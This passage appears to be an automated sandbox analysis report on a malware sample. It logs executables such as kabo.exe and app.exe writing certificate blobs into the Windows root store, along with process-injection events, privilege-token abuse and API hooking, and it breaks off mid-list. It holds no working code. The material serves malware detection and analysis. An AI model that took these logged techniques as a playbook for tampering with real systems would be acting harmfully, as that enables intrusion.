5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kabo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kabo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kabo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E app.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 0f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b050b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900200013202000470032000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c06200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f51400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b271d000000010000001000000054e2cd85ba79cda018fed9e6a863aa46030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 app.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 19000000010000001000000060e2dc65295f1062e558f3fef235ed3c030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e1d000000010000001000000054e2cd85ba79cda018fed9e6a863aa461400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b276200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f553000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000132020004700320000000f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b052000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 app.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 1380 PING.EXE 4196 PING.EXE 4900 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exerundll32.exechrome.exesvchost.exe8691400.exechrome.exechrome.exeultramediaburner.tmpchrome.exeSHaewushotezhi.exepid process 3692 chrome.exe 3692 chrome.exe 4656 chrome.exe 4656 chrome.exe 4532 chrome.exe 4532 chrome.exe 4312 chrome.exe 4312 chrome.exe 4000 chrome.exe 4000 chrome.exe 5588 chrome.exe 5588 chrome.exe 3040 rundll32.exe 3040 rundll32.exe 64 chrome.exe 64 chrome.exe 4716 svchost.exe 4716 svchost.exe 4716 svchost.exe 4716 svchost.exe 5500 8691400.exe 5500 8691400.exe 2516 chrome.exe 2516 chrome.exe 4256 chrome.exe 4256 chrome.exe 5884 ultramediaburner.tmp 5884 ultramediaburner.tmp 1692 chrome.exe 1692 chrome.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe 3964 SHaewushotezhi.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3048 -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
zlZefTpid process 1332 zlZefT 1332 zlZefT 1332 zlZefT -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
MicrosoftEdgeCP.exekabo.exetoolspab1.exeexplorer.exeexplorer.exeexplorer.exepid process 5628 MicrosoftEdgeCP.exe 5628 MicrosoftEdgeCP.exe 5628 MicrosoftEdgeCP.exe 5176 kabo.exe 5628 MicrosoftEdgeCP.exe 5628 MicrosoftEdgeCP.exe 2516 toolspab1.exe 3048 3048 3048 3048 3048 3048 3048 3048 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 6912 explorer.exe 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 3048 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 6308 explorer.exe 3048 3048 3048 3048 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 6260 explorer.exe 3048 3048 3048 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rundll32.exesvchost.exeJoSetp.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeTcbPrivilege 4716 svchost.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3036 JoSetp.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 3040 rundll32.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2736 svchost.exe Token: SeIncreaseQuotaPrivilege 2736 svchost.exe Token: SeSecurityPrivilege 2736 svchost.exe Token: SeTakeOwnershipPrivilege 2736 svchost.exe Token: SeLoadDriverPrivilege 2736 svchost.exe Token: SeSystemtimePrivilege 2736 svchost.exe Token: SeBackupPrivilege 2736 svchost.exe Token: SeRestorePrivilege 2736 svchost.exe Token: SeShutdownPrivilege 2736 svchost.exe Token: SeSystemEnvironmentPrivilege 2736 svchost.exe Token: SeUndockPrivilege 2736 svchost.exe Token: SeManageVolumePrivilege 2736 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2736 svchost.exe Token: SeIncreaseQuotaPrivilege 2736 svchost.exe Token: SeSecurityPrivilege 2736 svchost.exe Token: SeTakeOwnershipPrivilege 2736 svchost.exe Token: SeLoadDriverPrivilege 2736 svchost.exe Token: SeSystemtimePrivilege 2736 svchost.exe Token: SeBackupPrivilege 2736 svchost.exe Token: SeRestorePrivilege 2736 svchost.exe Token: SeShutdownPrivilege 2736 svchost.exe Token: SeSystemEnvironmentPrivilege 2736 svchost.exe Token: SeUndockPrivilege 2736 svchost.exe Token: SeManageVolumePrivilege 2736 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2736 svchost.exe Token: SeIncreaseQuotaPrivilege 2736 svchost.exe Token: SeSecurityPrivilege 2736 svchost.exe Token: SeTakeOwnershipPrivilege 2736 svchost.exe Token: SeLoadDriverPrivilege 2736 svchost.exe Token: SeSystemtimePrivilege 2736 svchost.exe Token: SeBackupPrivilege 2736 svchost.exe Token: SeRestorePrivilege 2736 svchost.exe Token: SeShutdownPrivilege 2736 svchost.exe Token: SeSystemEnvironmentPrivilege 2736 svchost.exe Token: SeUndockPrivilege 2736 svchost.exe Token: SeManageVolumePrivilege 2736 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2736 svchost.exe Token: SeIncreaseQuotaPrivilege 2736 svchost.exe Token: SeSecurityPrivilege 2736 svchost.exe Token: SeTakeOwnershipPrivilege 2736 svchost.exe Token: SeLoadDriverPrivilege 2736 svchost.exe Token: SeSystemtimePrivilege 2736 svchost.exe Token: SeBackupPrivilege 2736 svchost.exe Token: SeRestorePrivilege 2736 svchost.exe Token: SeShutdownPrivilege 2736 svchost.exe Token: SeSystemEnvironmentPrivilege 2736 svchost.exe Token: SeUndockPrivilege 2736 svchost.exe Token: SeManageVolumePrivilege 2736 svchost.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
chrome.exechrome.exeultramediaburner.tmpirecord.tmpUltraMediaBurner.exepid process 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4256 chrome.exe 4256 chrome.exe 5884 ultramediaburner.tmp 4656 irecord.tmp 5892 UltraMediaBurner.exe 5892 UltraMediaBurner.exe 3048 3048 3048 3048 3048 3048 3048 3048 -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
Free.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeUltraMediaBurner.exegoogle-game.exepid process 1964 Free.exe 1964 Free.exe 504 MicrosoftEdge.exe 5628 MicrosoftEdgeCP.exe 5628 MicrosoftEdgeCP.exe 5892 UltraMediaBurner.exe 2472 google-game.exe 2472 google-game.exe 3048 3048 3048 3048 3048 3048 3048 3048 3048 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3048 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 4656 wrote to memory of 4848 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4848 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3680 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3692 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 3692 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe chrome.exe PID 4656 wrote to memory of 4260 4656 chrome.exe 